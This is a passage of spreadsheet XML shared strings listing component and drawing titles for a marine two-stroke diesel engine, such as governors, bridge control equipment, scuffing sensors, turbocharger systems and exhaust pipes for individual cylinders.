    <t>MAIN PANEL</t>
  </si>
  <si>
    <t>BRIDGE PANEL</t>
  </si>
  <si>
    <t>SLOW DOWN SYSTEM</t>
  </si>
  <si>
    <t>WRONG WAY INTERLOCK</t>
  </si>
  <si>
    <t>ENGINE ROOM PANEL</t>
  </si>
  <si>
    <t>PNEUMATIC UNIT</t>
  </si>
  <si>
    <t>CHANGE-OVER VALVE</t>
  </si>
  <si>
    <t>BUZZER</t>
  </si>
  <si>
    <t>SOLENOID FOR INTERLOCK</t>
  </si>
  <si>
    <t>ALARM AUDIBLE</t>
  </si>
  <si>
    <t>ALARM VISUAL</t>
  </si>
  <si>
    <t>AHEAD-ASTERN INDICATOR</t>
  </si>
  <si>
    <t>SIGNAL PANEL</t>
  </si>
  <si>
    <t>SAFETY PANEL</t>
  </si>
  <si>
    <t>PILOT LAMPS</t>
  </si>
  <si>
    <t>PRESS.GAUGE &amp; THERMOMETER</t>
  </si>
  <si>
    <t>CHANGE-OVER SWITCH</t>
  </si>
  <si>
    <t>FILTER UNIT</t>
  </si>
  <si>
    <t>PUSH BUTTON</t>
  </si>
  <si>
    <t>POWER SUPPLY UNIT</t>
  </si>
  <si>
    <t>CONTROL SELECTOR</t>
  </si>
  <si>
    <t>TRANSFORM.+RECTIFIER UNIT</t>
  </si>
  <si>
    <t>DUST CAP FOR MAN.CONSOLE</t>
  </si>
  <si>
    <t>CRITICAL SPEED UNIT</t>
  </si>
  <si>
    <t>HOUR COUNTER</t>
  </si>
  <si>
    <t>FLASH RELAY</t>
  </si>
  <si>
    <t>DELAY RELAY</t>
  </si>
  <si>
    <t>CODE PLUG</t>
  </si>
  <si>
    <t>PRINTED CIRCUIT CARD</t>
  </si>
  <si>
    <t>PRINT PLUG</t>
  </si>
  <si>
    <t>EL.INSTRUMENT CURRENT</t>
  </si>
  <si>
    <t>FUSE SOCKET</t>
  </si>
  <si>
    <t>FUSE COVER</t>
  </si>
  <si>
    <t>SOCKET FOR R-I CONVERTER</t>
  </si>
  <si>
    <t>R-I CONVERTER</t>
  </si>
  <si>
    <t>UNIT FOR LAMP TEST</t>
  </si>
  <si>
    <t>INDEX INDICATOR</t>
  </si>
  <si>
    <t>VALVE 3-WAY</t>
  </si>
  <si>
    <t>SAFETY CONTROL SYSTEM</t>
  </si>
  <si>
    <t>OVERSPEED PROTECTION SYST</t>
  </si>
  <si>
    <t>SECTOR</t>
  </si>
  <si>
    <t>I/P CONVERTER</t>
  </si>
  <si>
    <t>BRACKET FOR SWITCHES</t>
  </si>
  <si>
    <t>EMERGENCY RUNNING BOX</t>
  </si>
  <si>
    <t>WATERPROOF LAMP COVER</t>
  </si>
  <si>
    <t>TERMINAL NUMBERS</t>
  </si>
  <si>
    <t>TACHO SYSTEM</t>
  </si>
  <si>
    <t>TELEGRAPH EQUIPMENT</t>
  </si>
  <si>
    <t>TACHO PICK-UPS FOR EL-GOV</t>
  </si>
  <si>
    <t>TACHO PICK-UP</t>
  </si>
  <si>
    <t>ENGINE INTERFACE UNIT ARR</t>
  </si>
  <si>
    <t>CYLINDER CONTROL UNIT ARR</t>
  </si>
  <si>
    <t>AUX. CONTROL UNIT, ARR.</t>
  </si>
  <si>
    <t>WIRING ON ENGINE</t>
  </si>
  <si>
    <t>ARR.OF CABLE CONDUITES</t>
  </si>
  <si>
    <t>ARR.OF WIRING ON ENGINE</t>
  </si>
  <si>
    <t>LOCATION OF CONTROL BOXES</t>
  </si>
  <si>
    <t>WIRING, ELECTRONICS</t>
  </si>
  <si>
    <t>WIRING, EL ACCESSORIES</t>
  </si>
  <si>
    <t>PLATES FOR PUMPS</t>
  </si>
  <si>
    <t>PLATES FOR FLANGE PLATE</t>
  </si>
  <si>
    <t>EL.DIAGRAM MANOEV.CONSOLE</t>
  </si>
  <si>
    <t>WRONG WAY PANEL</t>
  </si>
  <si>
    <t>CONTR.EQUIPM.F.AUX.BLOWER</t>
  </si>
  <si>
    <t>EL.PANEL AUX.BLOWER</t>
  </si>
  <si>
    <t>EL.DIAGRAM CYL.LUBRICATOR</t>
  </si>
  <si>
    <t>RECOMMENDED SPARE PARTS</t>
  </si>
  <si>
    <t>EL.DIAGRAM</t>
  </si>
  <si>
    <t>CONTROL SYSTEM FOR TCS</t>
  </si>
  <si>
    <t>CONTROL SYST. T/C CUT-OUT</t>
  </si>
  <si>
    <t>CONTROL SYST. T/C BY-PASS</t>
  </si>
  <si>
    <t>BRIDGE CONTROL EQUIPMENT</t>
  </si>
  <si>
    <t>BRIDGE CONTR.REQUIREMENTS</t>
  </si>
  <si>
    <t>ASSY OF REGULATING SHAFT</t>
  </si>
  <si>
    <t>PRIM.FUEL OIL PUMP MOUNT.</t>
  </si>
  <si>
    <t>FUEL OIL PUMP COMPLETE</t>
  </si>
  <si>
    <t>ARR. OF PREPUMP/COVER</t>
  </si>
  <si>
    <t>MOUNT. OF FUEL OIL PUMP</t>
  </si>
  <si>
    <t>BEARING-WELDED</t>
  </si>
  <si>
    <t>SPLIT COUPLING, COMPLET</t>
  </si>
  <si>
    <t>COUPLING ARRANGEMENT</t>
  </si>
  <si>
    <t>SPRING-LOADED LEVER CPL.</t>
  </si>
  <si>
    <t>ASSY OF LEVERS</t>
  </si>
  <si>
    <t>PULL ROD COMPLETE</t>
  </si>
  <si>
    <t>LEVER AND PULL ROD</t>
  </si>
  <si>
    <t>MONITORING EQUIPMENT</t>
  </si>
  <si>
    <t>PREP.F.MONITORING EQUIPM.</t>
  </si>
  <si>
    <t>BYPASS SYSTEM, COMPLETE</t>
  </si>
  <si>
    <t>BYPASS SYSTEM CONTROLLER</t>
  </si>
  <si>
    <t>PREPARATION FOR PMI SYST.</t>
  </si>
  <si>
    <t>CABLING OF PMI SYSTEM</t>
  </si>
  <si>
    <t>ASSY OF PMI TRAVEL SENSOR</t>
  </si>
  <si>
    <t>HOLE FOR PMI SENSOR LINER</t>
  </si>
  <si>
    <t>HOLES FOR PMI SENS. HOUS.</t>
  </si>
  <si>
    <t>MACHINING-PROTECTIVE TUBE</t>
  </si>
  <si>
    <t>TOOTHING-TELESCOPIC PIPE</t>
  </si>
  <si>
    <t>CONNECT.BOX, TRAVEL SENS</t>
  </si>
  <si>
    <t>ARR.OF SCUFFING EQUIPMENT</t>
  </si>
  <si>
    <t>PREP.F.SCUFFING EQUIPMENT</t>
  </si>
  <si>
    <t>ASSY OF SCUFFING SENSORS</t>
  </si>
  <si>
    <t>PLUGGING SCUFF,SENS.HOLES</t>
  </si>
  <si>
    <t>SCUFFING JUNCTION BOX</t>
  </si>
  <si>
    <t>ALARM BOX,SCUFFING SYSTEM</t>
  </si>
  <si>
    <t>SCUFFING SENSOR</t>
  </si>
  <si>
    <t>ARR. INTERMITTENT LUBRIC</t>
  </si>
  <si>
    <t>TACHO SYSTEM F.INTERM.LUB</t>
  </si>
  <si>
    <t>CONTROL BOX,INTERMITT LUB</t>
  </si>
  <si>
    <t>HOLES F.MONITORING EQUIP.</t>
  </si>
  <si>
    <t>PREPARATION FOR MIP SYST.</t>
  </si>
  <si>
    <t>ASSY OF SENSOR ADAPTOR</t>
  </si>
  <si>
    <t>SHUT OFF VALVE (HP F.O.)</t>
  </si>
  <si>
    <t>ASSY OF SHUT OFF VALVE</t>
  </si>
  <si>
    <t>MIP EQUIPMENT</t>
  </si>
  <si>
    <t>ARMHOLDER COMPLETE</t>
  </si>
  <si>
    <t>SPRING LOADED PULL ROD</t>
  </si>
  <si>
    <t>SPRING LOADED LEVER</t>
  </si>
  <si>
    <t>MONT. OF PNEUMATICAL CYL.</t>
  </si>
  <si>
    <t>MOUNTING OF BRACKET</t>
  </si>
  <si>
    <t>PLATE WELDING</t>
  </si>
  <si>
    <t>INDEX AND OVERSPEED ARR.</t>
  </si>
  <si>
    <t>FUEL LIMIT CYLINDER</t>
  </si>
  <si>
    <t>ARM COMPLETE</t>
  </si>
  <si>
    <t>BALANCE ARM UNIT</t>
  </si>
  <si>
    <t>BALANCE ARM MOUNTING</t>
  </si>
  <si>
    <t>ADJUSTING INSTRUCTION</t>
  </si>
  <si>
    <t>MAXIMUM GOVERNOR</t>
  </si>
  <si>
    <t>P.G.GOVERNOR</t>
  </si>
  <si>
    <t>DIAL TYPE GOVERNOR</t>
  </si>
  <si>
    <t>BOOSTER FOR GOVERNOR</t>
  </si>
  <si>
    <t>HYDRAULIC AMPLIFIER</t>
  </si>
  <si>
    <t>ELECTRICAL GOV. ACTUATOR</t>
  </si>
  <si>
    <t>EQUIPMENT FOR EL.GOVERNOR</t>
  </si>
  <si>
    <t>UG-GOVERNOR</t>
  </si>
  <si>
    <t>SYNCHRONIZING EQUIPMENT</t>
  </si>
  <si>
    <t>COOLER FOR GOVERNOR</t>
  </si>
  <si>
    <t>HYDRAULIC PUMP UNIT</t>
  </si>
  <si>
    <t>CONTROL UNIT, CYL.CUT-OUT</t>
  </si>
  <si>
    <t>LEVERS ON GOVERNOR</t>
  </si>
  <si>
    <t>ARR.OF PUMP GROUP</t>
  </si>
  <si>
    <t>GOVERNOR AND DRIVE</t>
  </si>
  <si>
    <t>ARR.OF PRESSURE SWITCHES</t>
  </si>
  <si>
    <t>SHAFT COMPLETE</t>
  </si>
  <si>
    <t>PIPES FOR GOVERNOR COOLER</t>
  </si>
  <si>
    <t>ASSY OF PRESSURE GAUGE</t>
  </si>
  <si>
    <t>ASSY OF GOVERNOR DRIVE</t>
  </si>
  <si>
    <t>ARR.OF GOV.+AMPLIFIER</t>
  </si>
  <si>
    <t>ARR.OF EL.GOVERNOR</t>
  </si>
  <si>
    <t>ARR.OF EL-WIRING</t>
  </si>
  <si>
    <t>ARR. OF GOVERNOR</t>
  </si>
  <si>
    <t>PAWL ARM</t>
  </si>
  <si>
    <t>BEARING WITH WHITE METAL</t>
  </si>
  <si>
    <t>MOUNTING OF COUPLING PART</t>
  </si>
  <si>
    <t>GOVERNOR DRIVE MOUNTING</t>
  </si>
  <si>
    <t>MOUNT. OF GOVERNOR</t>
  </si>
  <si>
    <t>GOVERNOR AND DRIVE COMPL.</t>
  </si>
  <si>
    <t>PIPE FOR BOOSTER</t>
  </si>
  <si>
    <t>PIPE FOR OVERSPEED TRIP</t>
  </si>
  <si>
    <t>MOUNTING OF STOP DEVICE</t>
  </si>
  <si>
    <t>OVERSPEED STOP-MOUNTING</t>
  </si>
  <si>
    <t>MOUNT. OF PNEUMATICAL CYL</t>
  </si>
  <si>
    <t>OVERSPEED STOP MOUNTING</t>
  </si>
  <si>
    <t>M. OF OVERSP. &amp; PNEU. CYL</t>
  </si>
  <si>
    <t>BEVEL GEAR, ONE PAIR</t>
  </si>
  <si>
    <t>WOODWARD ARM.      145227</t>
  </si>
  <si>
    <t>ENGINE CONTROL SYSTEM</t>
  </si>
  <si>
    <t>SPRING-LOADED PULL-ROD</t>
  </si>
  <si>
    <t>SPEED CONTROL SYSTEM EGB</t>
  </si>
  <si>
    <t>MOUNT. OF PNEUM. CYL.</t>
  </si>
  <si>
    <t>FUEL LIMITING CYLINDER</t>
  </si>
  <si>
    <t>MANOEUVRING GEAR</t>
  </si>
  <si>
    <t>CONTROL ARRANGEMENT-PNEU.</t>
  </si>
  <si>
    <t>MANOEUVRING SYSTEM</t>
  </si>
  <si>
    <t>ORDER LIST</t>
  </si>
  <si>
    <t>PARTS LIST-PIPE ARR.</t>
  </si>
  <si>
    <t>PRESSURE RISER+AUTOMATICS</t>
  </si>
  <si>
    <t>ARR. OF CONTROL EQUIPMENT</t>
  </si>
  <si>
    <t>CONTR.EQ.WITHOUT BR.CONTR</t>
  </si>
  <si>
    <t>CONTROL EQ.WITH BR.CONTR.</t>
  </si>
  <si>
    <t>ASSY OF CONTROL VALVE</t>
  </si>
  <si>
    <t>CONN.OF JET-ASSISTANCE</t>
  </si>
  <si>
    <t>TACHO SAFETY EQUIPMENT</t>
  </si>
  <si>
    <t>MAN.SYSTEM-CONVERSION</t>
  </si>
  <si>
    <t>ASSY OF MANOEU. SYS. UNIT</t>
  </si>
  <si>
    <t>ASSY OF VIT CONTROL UNIT</t>
  </si>
  <si>
    <t>CABLING OF MANOE.SYS.UNIT</t>
  </si>
  <si>
    <t>ASSY OF GEARBOX</t>
  </si>
  <si>
    <t>PARTS LIST-REGULAT.DRIVE</t>
  </si>
  <si>
    <t>ARR.OF AIR RECEIVER</t>
  </si>
  <si>
    <t>PARTS LIST-AIR RECEIVER</t>
  </si>
  <si>
    <t>AIR CYLINDER+MAGNET VALVE</t>
  </si>
  <si>
    <t>PARTS LIST-PRESS.CONTROL</t>
  </si>
  <si>
    <t>MAN.VALVE EMERG. BRACKET</t>
  </si>
  <si>
    <t>VALVE FOR BRAKE CYLINDER</t>
  </si>
  <si>
    <t>ASSY OF SLIDING SLEEVE</t>
  </si>
  <si>
    <t>PRESSURE RISER WITH PIPES</t>
  </si>
  <si>
    <t>ASSY OF VALVES</t>
  </si>
  <si>
    <t>ASSY OF INDUCTION SENSOR</t>
  </si>
  <si>
    <t>SHAFT FOR GEARBOX COMPL.</t>
  </si>
  <si>
    <t>REVERSING ST.AIR DISTRIB.</t>
  </si>
  <si>
    <t>GEAR BOX WITH COVER</t>
  </si>
  <si>
    <t>GEAR BOX WITH BEARING</t>
  </si>
  <si>
    <t>GEAR BOX WITH GENERATOR</t>
  </si>
  <si>
    <t>GEAR FOR SYNCHRONIZING</t>
  </si>
  <si>
    <t>PLATE FOR HYDRAULICS</t>
  </si>
  <si>
    <t>COUPLING FOR OVERSPEED</t>
  </si>
  <si>
    <t>LOCAL MANOEUVRING CONSOLE</t>
  </si>
  <si>
    <t>PARTS LIST-SECTOR BRACKET</t>
  </si>
  <si>
    <t>PARTS LIST ASSEMBLY POINT</t>
  </si>
  <si>
    <t>REVERSING VALVE</t>
  </si>
  <si>
    <t>ASSY OF MASTER VALVE</t>
  </si>
  <si>
    <t>ASSY OF VALVES+SWITCHES</t>
  </si>
  <si>
    <t>VALVES FOR BRAKE CYLINDER</t>
  </si>
  <si>
    <t>ARR.OF LOAD TRANSMITTER</t>
  </si>
  <si>
    <t>ARR.OF PRESSURE SWITCH</t>
  </si>
  <si>
    <t>ARR.OF SHUTDOWN DEVICE</t>
  </si>
  <si>
    <t>ASSY OF AIR CYLINDER</t>
  </si>
  <si>
    <t>HANDLE COMPLETE</t>
  </si>
  <si>
    <t>ARR. OF REDUCING VALVE</t>
  </si>
  <si>
    <t>ARR.OF CONTROL AIR</t>
  </si>
  <si>
    <t>ANGLE TRANSMITTER</t>
  </si>
  <si>
    <t>VALVES</t>
  </si>
  <si>
    <t>QUICK CLOSING VALVE</t>
  </si>
  <si>
    <t>MASTER VALVE COMPL.</t>
  </si>
  <si>
    <t>PRESSURE RISER COMPLETE</t>
  </si>
  <si>
    <t>ASSY OF REDUCING VALVES</t>
  </si>
  <si>
    <t>ARR.OF PICK-UPS</t>
  </si>
  <si>
    <t>ARR.OF PRESSURE CONVERTER</t>
  </si>
  <si>
    <t>ARR.OF MAX.STOP SCREW</t>
  </si>
  <si>
    <t>OVERSPEED STOP</t>
  </si>
  <si>
    <t>ARR.OF OIL TANK</t>
  </si>
  <si>
    <t>ARR.OF ACCUMULATOR</t>
  </si>
  <si>
    <t>BLOCKING OF ST.AIR DISTR.</t>
  </si>
  <si>
    <t>SHUT-OFF COCK WITH SWITCH</t>
  </si>
  <si>
    <t>BLOCKING OF ACTUATOR</t>
  </si>
  <si>
    <t>MOUNT., LOCAL CONTROL BOX</t>
  </si>
  <si>
    <t>QUICK RELEASE VALVE</t>
  </si>
  <si>
    <t>HUB WITH ARMS</t>
  </si>
  <si>
    <t>INSTRUMENT BOX</t>
  </si>
  <si>
    <t>INSTRUMENT BOX-COMPLETE</t>
  </si>
  <si>
    <t>CLAMPING ARM COMPLETE</t>
  </si>
  <si>
    <t>ANGLE LEVER COMPLETE</t>
  </si>
  <si>
    <t>THROTTLE SCREW SECURING</t>
  </si>
  <si>
    <t>FINE ADJUSTING</t>
  </si>
  <si>
    <t>ELECTRICAL GENERATOR</t>
  </si>
  <si>
    <t>SUPPORT FOR MAGNET</t>
  </si>
  <si>
    <t>POTENTIOMETER</t>
  </si>
  <si>
    <t>REDUCING VALVE</t>
  </si>
  <si>
    <t>MULTI-WAY VALVE</t>
  </si>
  <si>
    <t>PLATE WITH PNEUMATICS</t>
  </si>
  <si>
    <t>DIRECTION FINDER</t>
  </si>
  <si>
    <t>EQUIPMENT FOR TACHOMETER</t>
  </si>
  <si>
    <t>ARR. OF MECH. TACHOMETER</t>
  </si>
  <si>
    <t>EL.COPM.,MANOEUVR.SYST.</t>
  </si>
  <si>
    <t>ADJUSTMENT KNOB</t>
  </si>
  <si>
    <t>SWITCH PANEL</t>
  </si>
  <si>
    <t>DIAGRAM OF MANOEUVR.SYST.</t>
  </si>
  <si>
    <t>SUPPLEMENT TO MAN.SYST.</t>
  </si>
  <si>
    <t>LIST OF COMPONENTS</t>
  </si>
  <si>
    <t>TC CUT OFF CONTROL SYSTEM</t>
  </si>
  <si>
    <t>SPARE PARTS MANOEUV.SYST.</t>
  </si>
  <si>
    <t>TOP COVER WITH PISTON</t>
  </si>
  <si>
    <t>STARTING SLIDE</t>
  </si>
  <si>
    <t>ROCKER PIECE</t>
  </si>
  <si>
    <t>LOCK FOR HAND WHEEL</t>
  </si>
  <si>
    <t>WRENCH FOR STARTING SLIDE</t>
  </si>
  <si>
    <t>SLIDE COMPLETE</t>
  </si>
  <si>
    <t>STARTING AIR SLIDE</t>
  </si>
  <si>
    <t>COVER F. ST. AIR SLIDE</t>
  </si>
  <si>
    <t>MOUNT.OF START. AIR SLIDE</t>
  </si>
  <si>
    <t>BRAKE CYLINDER COMPLETE</t>
  </si>
  <si>
    <t>POSITION INDICATOR</t>
  </si>
  <si>
    <t>TCS AND/OR PTO SYSTEMS</t>
  </si>
  <si>
    <t>ARR. OF AIR INLET</t>
  </si>
  <si>
    <t>TCS/PTI SYSTEM</t>
  </si>
  <si>
    <t>PTO/PTI SYSTEM</t>
  </si>
  <si>
    <t>PTO/RCF SYSTEM</t>
  </si>
  <si>
    <t>ARR. OF TC DUCTING</t>
  </si>
  <si>
    <t>ORDER LIST-POWER TURBINE</t>
  </si>
  <si>
    <t>ORDER LIST-RCF/TCS</t>
  </si>
  <si>
    <t>ORDER LIST-BWIII/RKAV/TCS</t>
  </si>
  <si>
    <t>ORDER LIST-BWIII/GCR</t>
  </si>
  <si>
    <t>ORDER LIST-PTO/CFE</t>
  </si>
  <si>
    <t>ORDER LIST-RCF</t>
  </si>
  <si>
    <t>ORDER LIST-TCS</t>
  </si>
  <si>
    <t>ORDER LIST-DMG</t>
  </si>
  <si>
    <t>ORDER LIST-BL</t>
  </si>
  <si>
    <t>ORDER LIST-GCR</t>
  </si>
  <si>
    <t>VARIOUS PIPES-TCS</t>
  </si>
  <si>
    <t>VARIOUS PIPES-RCF</t>
  </si>
  <si>
    <t>LUB.OIL PIPES-POWER TURB.</t>
  </si>
  <si>
    <t>SEALING AIR-POWER TURBINE</t>
  </si>
  <si>
    <t>FRESHW. PIPES-POWER TURB.</t>
  </si>
  <si>
    <t>DRY CLEANING TCS</t>
  </si>
  <si>
    <t>SUPPORT EXH. PIPE TCS</t>
  </si>
  <si>
    <t>GALLERY BRACKET-PTO</t>
  </si>
  <si>
    <t>TCS CONTROL PANEL</t>
  </si>
  <si>
    <t>INSTRUMENTS-TCS</t>
  </si>
  <si>
    <t>INSTRUMENTATION-STANDARD</t>
  </si>
  <si>
    <t>CONN.F.SUPPLEM.SIGNAL EQP</t>
  </si>
  <si>
    <t>GEAR F.VALVES &amp; PUMP</t>
  </si>
  <si>
    <t>MOUNT.OF SAFETY+INDIC.VAL</t>
  </si>
  <si>
    <t>SUPPL.DRG. F.INDICATOR V.</t>
  </si>
  <si>
    <t>CONN. PIECE W/INDICATOR</t>
  </si>
  <si>
    <t>SHAFT WITH GUIDE</t>
  </si>
  <si>
    <t>NEEDLE BEARING</t>
  </si>
  <si>
    <t>TOGGLE JOINT</t>
  </si>
  <si>
    <t>INDICATOR COCK-MOUNTING</t>
  </si>
  <si>
    <t>INDICATOR COCK</t>
  </si>
  <si>
    <t>CAP NUT WITH PACKING</t>
  </si>
  <si>
    <t>MOMENT COMP. ON ENGINE</t>
  </si>
  <si>
    <t>MOMENT COMPENSATOR</t>
  </si>
  <si>
    <t>PARTS LIST-CHAIN</t>
  </si>
  <si>
    <t>SUPPL.FOR MOMENT COMP.</t>
  </si>
  <si>
    <t>TORQUE EQUALIZER ON ENGIN</t>
  </si>
  <si>
    <t>SCRAPER RING COV.W.BEAR.</t>
  </si>
  <si>
    <t>CHAIN TIGHTENER</t>
  </si>
  <si>
    <t>ADJUSTM.OF CHAIN TIGHT.</t>
  </si>
  <si>
    <t>OILFLOW REGULAT.PLUG ASSY</t>
  </si>
  <si>
    <t>MOUNT.OF FLYWEIGHTS</t>
  </si>
  <si>
    <t>SHAFT, COMPLETE</t>
  </si>
  <si>
    <t>TOOL, MOMEMT COMPENSATOR</t>
  </si>
  <si>
    <t>COOLER HOUSING</t>
  </si>
  <si>
    <t>SCAV.AIR REC. MACHINING</t>
  </si>
  <si>
    <t>SCAV.AIR REC. WELDING</t>
  </si>
  <si>
    <t>SCAV.AIR REC. PLATES</t>
  </si>
  <si>
    <t>NOSE FOR COOLER</t>
  </si>
  <si>
    <t>ORIFICE ARR. SCAV.AIR REC</t>
  </si>
  <si>
    <t>INLET FOR AUX.BLOWER</t>
  </si>
  <si>
    <t>FLANGE WITH SKIRT</t>
  </si>
  <si>
    <t>PIPE FOR SAFETY VALVE</t>
  </si>
  <si>
    <t>PIPE FOR MAN HOLE</t>
  </si>
  <si>
    <t>STOP SPRING</t>
  </si>
  <si>
    <t>VENTING DEVICE</t>
  </si>
  <si>
    <t>BODY F. NON RETURN VALVE</t>
  </si>
  <si>
    <t>ARR.OF NON-RETURN VALVE</t>
  </si>
  <si>
    <t>ALT:ARR.NON RETURN VALVES</t>
  </si>
  <si>
    <t>ARR. CHARGING AIR PIPE</t>
  </si>
  <si>
    <t>ARR.MEASURING PIPE</t>
  </si>
  <si>
    <t>SUCTION PIECE</t>
  </si>
  <si>
    <t>MEASURING PIPE</t>
  </si>
  <si>
    <t>SUCTION CAP</t>
  </si>
  <si>
    <t>SEATING FOR BLOWER</t>
  </si>
  <si>
    <t>ARR.OF AUXILIARY BLOWER</t>
  </si>
  <si>
    <t>DELIVERY PIPE</t>
  </si>
  <si>
    <t>SHELL FOR DELIVERY PIPE</t>
  </si>
  <si>
    <t>SUCTION PIPE, T-PIPE</t>
  </si>
  <si>
    <t>SUCTION BOX</t>
  </si>
  <si>
    <t>MANHOLE COVER, SCAV. REC.</t>
  </si>
  <si>
    <t>INLET COMPLETE</t>
  </si>
  <si>
    <t>SUCTION PIPE COMPLETE</t>
  </si>
  <si>
    <t>SCAV. AIR RECEIVER COMPL.</t>
  </si>
  <si>
    <t>DIFFUSOR</t>
  </si>
  <si>
    <t>CHAR.AIR CONNECTING PIECE</t>
  </si>
  <si>
    <t>GEAR COUPLING</t>
  </si>
  <si>
    <t>SCAV. AIR REC.+PIPES REAR</t>
  </si>
  <si>
    <t>INSULATION-COOLER FRAME</t>
  </si>
  <si>
    <t>INSULATION-SCAV.AIR REC.</t>
  </si>
  <si>
    <t>CHARGING AIR COOLER</t>
  </si>
  <si>
    <t>CONDENSATE DISCHARGE ARR.</t>
  </si>
  <si>
    <t>AIR INLET</t>
  </si>
  <si>
    <t>SHIELDING FOR DIFFUSER</t>
  </si>
  <si>
    <t>T-PIPE-EXH.VALVE-BOLTED</t>
  </si>
  <si>
    <t>T-PIPE-EXH.VALVE-CLAMPED</t>
  </si>
  <si>
    <t>BRANCH PIPE-CLAMPED</t>
  </si>
  <si>
    <t>INTERMEDIATE PIPE-CLAMPED</t>
  </si>
  <si>
    <t>CROSS PIPE-T.C.-CLAMPED</t>
  </si>
  <si>
    <t>T-PIPE-UPPER-CLAMPED</t>
  </si>
  <si>
    <t>BEND-TURBOCHARGER-CLAMPED</t>
  </si>
  <si>
    <t>EXHAUST GAS PIPES</t>
  </si>
  <si>
    <t>HOLDER WITH GRID-BOLTED</t>
  </si>
  <si>
    <t>HOLDER WITH GRID-CLAMPED</t>
  </si>
  <si>
    <t>INSULATION OF TC. INLET</t>
  </si>
  <si>
    <t>PIPE STUB WITH FLANGE</t>
  </si>
  <si>
    <t>INSULATION AT EXH.VALVE</t>
  </si>
  <si>
    <t>INSULATION AT FLANGE CONN</t>
  </si>
  <si>
    <t>EXPANSION JOINT</t>
  </si>
  <si>
    <t>DETAIL OF COMPENSATOR</t>
  </si>
  <si>
    <t>ARR.OF EXHAUST RECEIVER</t>
  </si>
  <si>
    <t>EXHAUST RECEIVER, MACH.</t>
  </si>
  <si>
    <t>EXHAUST RECEIVER, WELDING</t>
  </si>
  <si>
    <t>EXHAUST RECEIVER, PLATES</t>
  </si>
  <si>
    <t>SAFETY HOOP</t>
  </si>
  <si>
    <t>EXHAUST PIPE FOR CYL.2+3</t>
  </si>
  <si>
    <t>EXHAUST PIPES COMPLETE</t>
  </si>
  <si>
    <t>EXHAUST PIPE FOR CYL.2B</t>
  </si>
  <si>
    <t>EXHAUST PIPE FOR CYL.4B</t>
  </si>
  <si>
    <t>MOUNTING OF END PLATE</t>
  </si>
  <si>
    <t>EXHAUST PIPE F.CYL.4+5+6</t>
  </si>
  <si>
    <t>EXHAUST PIPE FOR CYL.1A</t>
  </si>
  <si>
    <t>EXHAUST PIPE FOR CYL.3A</t>
  </si>
  <si>
    <t>EXHAUST PIPE FOR CYL.1B</t>
  </si>
  <si>
    <t>EXHAUST PIPE FOR CYL.3B</t>
  </si>
  <si>
    <t>EXHAUST PIPE FOR CYL.6</t>
  </si>
  <si>
    <t>EXHAUST PIPE FOR CYL.7</t>
  </si>
  <si>
    <t>EXHAUST PIPE FOR CYL.6A</t>
  </si>
  <si>
    <t>EXHAUST PIPE FOR CYL.4+5</t>
  </si>
  <si>
    <t>EXHAUST PIPE FOR CYL.2A</t>
  </si>
  <si>
    <t>EXHAUST PIPE FOR CYL.4A</t>
  </si>
  <si>
    <t>EXHAUST PIPE FOR CYL.2</t>
  </si>
  <si>
    <t>EXHAUST PIPE FOR CYL.3</t>
  </si>
  <si>
    <t>EXHAUST PIPE FOR CYL.4</t>
  </si>
  <si>
    <t>EXHAUST PIPE FOR CYL.5</t>
  </si>
  <si>
    <t>EXHAUST PIPE FOR CYL. 6B</t>
  </si>
  <si>
    <t>EXHAUST PIPE F.CYL.4A-5A</t>
  </si>
  <si>
    <t>EXHAUST PIPE F.CYL.1A-2A</t>
  </si>
  <si>
    <t>EXHAUST PIPE F.CYL.1B-2B</t>
  </si>
  <si>
    <t>EXHAUST PIPE F.CYL.4B-5B</t>
  </si>
  <si>
    <t>EXHAUST PIPE F.CYL.1A,7B</t>
  </si>
  <si>
    <t>EXHAUST PIPE F.CYL.2A,6B</t>
  </si>
  <si>
    <t>EXHAUST PIPE F.CYL.7A,1B</t>
  </si>
  <si>
    <t>EXHAUST PIPE F.CYL.3A,5B</t>
  </si>
  <si>
    <t>EXHAUST PIPE F.CYL.6A,2B</t>
  </si>
  <si>
    <t>SUPPORT FOR EXHAUST PIPE</t>
  </si>
  <si>
    <t>FRAME FOR EXHAUST PIPE</t>
  </si>
  <si>
    <t>HYDR.BRACING FOR EXH.REC.</t>
  </si>
  <si>
    <t>PIPE FOR HYDR.EXH.BRACING</t>
  </si>
  <si>
    <t>EXH. PIPE-CYL.4A-5A,3B-4B</t>
  </si>
  <si>
    <t>EXHAUST OUTLET AFTER TC</t>
  </si>
  <si>
    <t>EXHAUST PIPE FOR CYL. 8</t>
  </si>
  <si>
    <t>PULSECONVERTER</t>
  </si>
  <si>
    <t>FRAME FORE END</t>
  </si>
  <si>
    <t>INSULATION BOX</t>
  </si>
  <si>
    <t>EXHAUST RECEIVER</t>
  </si>
  <si>
    <t>ARR. OF INSULATION</t>
  </si>
  <si>
    <t>EXHAUST PIPE FOR CYL. 3+4</t>
  </si>
  <si>
    <t>EXHAUST PIPE FOR CYL.5+6</t>
  </si>
  <si>
    <t>EXHAUST PIPE FOR CYL.1+2</t>
  </si>
  <si>
    <t>MANHOLE COVER EXH. REC.</t>
  </si>
  <si>
    <t>SUPPORT-STAYBOLT/RECEIVER</t>
  </si>
  <si>
    <t>INSULATION FRAME</t>
  </si>
  <si>
    <t>MOUNTING OF PIPE FOR T.C.</t>
  </si>
  <si>
    <t>ARR. OF DRY CLEANING</t>
  </si>
  <si>
    <t>BLOW GUN</t>
  </si>
  <si>
    <t>CONTAINER COMPLETE</t>
  </si>
  <si>
    <t>WATER WASH OF T.C.</t>
  </si>
  <si>
    <t>BY-PASS FROM EXH.RECEIVER</t>
  </si>
  <si>
    <t>EXH.REC.,BY-PASS</t>
  </si>
  <si>
    <t>EXH.REC.,EMERG.BY-PASS</t>
  </si>
  <si>
    <t>EXHAUST RECEIVER,TCS</t>
  </si>
  <si>
    <t>EXH.REC.BY-PASS(INSULAT.)</t>
  </si>
  <si>
    <t>EXH.PIPE CYL. 8A,9A,1B,2B</t>
  </si>
  <si>
    <t>EXH.PIPE F.CYL1A,2A,8B,9B</t>
  </si>
  <si>
    <t>EXH.PIPE F. CYL. 3A,7B</t>
  </si>
  <si>
    <t>EXHAUST PIPE F. CYL.4A,6B</t>
  </si>
  <si>
    <t>EXHAUST PIPE F. CYL.5A,5B</t>
  </si>
  <si>
    <t>EXHAUST PIPE F. CYL.6A,4B</t>
  </si>
  <si>
    <t>EXHAUST PIPE F. CYL.7A,3B</t>
  </si>
  <si>
    <t>EXHAUST PIPE F. CYL.8A,2B</t>
  </si>
  <si>
    <t>EXH.PIPE F. CYL. 9A,1B</t>
  </si>
